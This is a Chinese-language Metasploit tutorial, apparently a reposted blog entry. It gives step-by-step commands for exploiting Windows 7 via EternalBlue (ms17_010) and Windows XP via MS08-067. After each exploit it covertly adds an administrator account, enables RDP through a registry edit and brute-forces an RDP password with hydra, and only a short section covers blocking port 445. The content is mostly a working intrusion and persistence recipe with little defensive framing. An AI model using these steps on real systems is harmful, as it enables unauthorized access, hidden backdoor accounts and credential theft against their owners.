1. 程式人生 > >metasploit滲透測試

metasploit滲透測試

一些常用指令

msfconsole 開啟控制檯終端
msfupdate 更新
help [command] e.g. help search 命令使用幫助資訊
search […] e.g. search portscan

use … 選擇滲透攻擊模組
show payloads 檢視與該攻擊模組相相容的攻擊載荷
set payload … 設定攻擊載荷
set target 設定目標
show options 檢視需要設定的配置引數
exploit 實施滲透攻擊

metasploit滲透攻擊模組在目錄/usr/share/metasploit-framework/modules/exploits

nmap <掃描選項><掃描目標>

攻擊例項

1、利用永恆之藍(ms17_010)漏洞攻擊win7

  1. 開啟metasploit
    msfconsole
  2. 使用永恆之藍模組
    search ms17-01
    use exploit/windows/smb/ms17_010_eternalblue
  3. 填充各種指令,主要是靶機IP,其中445埠已經默認了,其他不用改
    show options
    set RHOST 192.168.12.1
  4. 攻擊
    exploit或者run
  5. 建立新使用者,偷偷的控制使用
    net user admin 123456 /add
  6. 提權,將新建立的使用者admin提到管理員許可權
    net localgroup administrators admin /add
    檢視許可權:
    net user admin

防禦辦法:
1,網上下載補丁,
2,關閉445埠,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
檢測445埠是否開啟:
netstat -ano -p tcp | find “445”

2、利用Windows Server服務RPC請求緩衝區溢位漏洞(ms_08067)入侵WinXP

  1. 在msfconsole使用search命令搜尋MS08067漏洞攻擊程式
  2. 使用use命令呼叫MS08067漏洞攻擊程式
    use exploit/windows/smb/ms08_067_netapi
  3. 使用show options 命令檢視需要設定的選項
    可以看到還需設定RHOST(目標地址)、Exploit target(攻擊目標)
    使用 set 命令設定 Module Options,此處需要設定目標IP
  4. 接著設定Exploit target,使用show targets 檢視可選項
    可以看出哪些版本的系統存在此漏洞,攻擊的XP系統為WinXP SP3 簡體中文版,即使用set target 命令設定目標,此處即為set target 34
  5. 此時再用show options 可以看到全部設定完成,接著使用exploit 或者 run 進行攻擊,執行exploit命令後得到一個meterpreter
  6. 在meterpreter中輸入shell即可進入CMD視窗
  7. 可以進行一些攻擊,如遠端桌面控制:
    —-開啟RDP服務
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    —-使用netstat -an命令檢視埠是否開放
    —-接著使用net user命令檢視XP系統中的使用者
    net user
    —-然後針對指定使用者比如sysorem使用者進行登入密碼爆破
    hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
    —-使用hydra爆破密碼得:12345接著就能直接登入XP進行遠端控制
    rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
    —-完成遠端控制